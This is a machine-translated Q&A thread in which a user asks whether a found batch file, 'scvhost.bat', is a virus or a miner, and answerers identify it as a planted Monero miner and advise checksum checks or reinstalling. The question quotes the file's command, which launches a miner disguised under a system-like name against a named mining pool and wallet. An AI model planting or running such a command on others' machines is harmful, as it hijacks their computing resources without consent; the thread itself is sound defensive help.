Est-ce que scvhost.bat avec cryptonight est un virus ou un mineur?

17

Je viens de trouver ce fichier .bat nommé scvhost.bat. Le fichier contenait ce contenu:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Est-ce un virus (pour voler des informations, etc.) ou un mineur planté? Je suis inquiet car je m'essaie également aux crypto-monnaies et stratumest une devise mentionnée dans le fichier ci-dessus.

windows batch-file malware cryptomining NewbieProgrammer
la source
1
Cela semble en effet être un mineur. Étant donné que vous utilisez vous-même les crypto-monnaies, si vous exploitez également, assurez-vous que cela ne fait pas partie de tout ce que vous utilisez pour extraire. Vous pouvez le faire en renommant l'extension .bat en quelque chose d'autre et voir si vous pouvez toujours exploiter normalement après un redémarrage. Une chose que je trouve étrange à propos de ce fichier est que normalement il s'appellerait lui-même étant donné que scvhost est à la fois le nom de ce qu'il exécute et le fichier bat. Normalement, cela entraînerait une boucle.
LPChip
2
@VirtualAnomaly Je pense que vous vous trompez sVChost avec sCVhost mentionné ici. Oui, je suis très conscient que svchost est la mécanique des services d'hébergement.
LPChip
2
@LPChip Mes excuses, vous avez raison, je me suis trompé.
Anomalie virtuelle
2
Quelqu'un a trop joué à Starcraft, je suppose.
CodesInChaos
1
Les SCV @lucidbrot sont l'unité "constructeur" d'une des races du jeu (terrans), auquel cas il signifie "Space Construction Vehicle".
Aaron

Réponses:

34

Cela semble être un mineur d'une certaine sorte, d'autant plus que le paramètre contient l'URL d'un pool d'exploration de données. Cependant, vous devez être sûr de ce qui se trouve dans le binaire. Il serait logique de comparer les sommes de contrôle du binaire que vous avez trouvé de votre système avec les versions faites par l'équipe de développement du mineur. S'ils diffèrent; considérez que votre système n'est pas sécurisé.

Un autre problème est que vous avez découvert ce mineur (probablement parce qu'il utilisait beaucoup de CPU), mais vous n'avez aucune idée de ce qui s'est passé sur votre système. Si un intrus avait pu lancer le mineur, il aurait pu lancer d'autres choses également. Ce pourrait être une bonne idée de récupérer à partir de la sauvegarde ou de faire une nouvelle installation de toute façon.

mtak
la source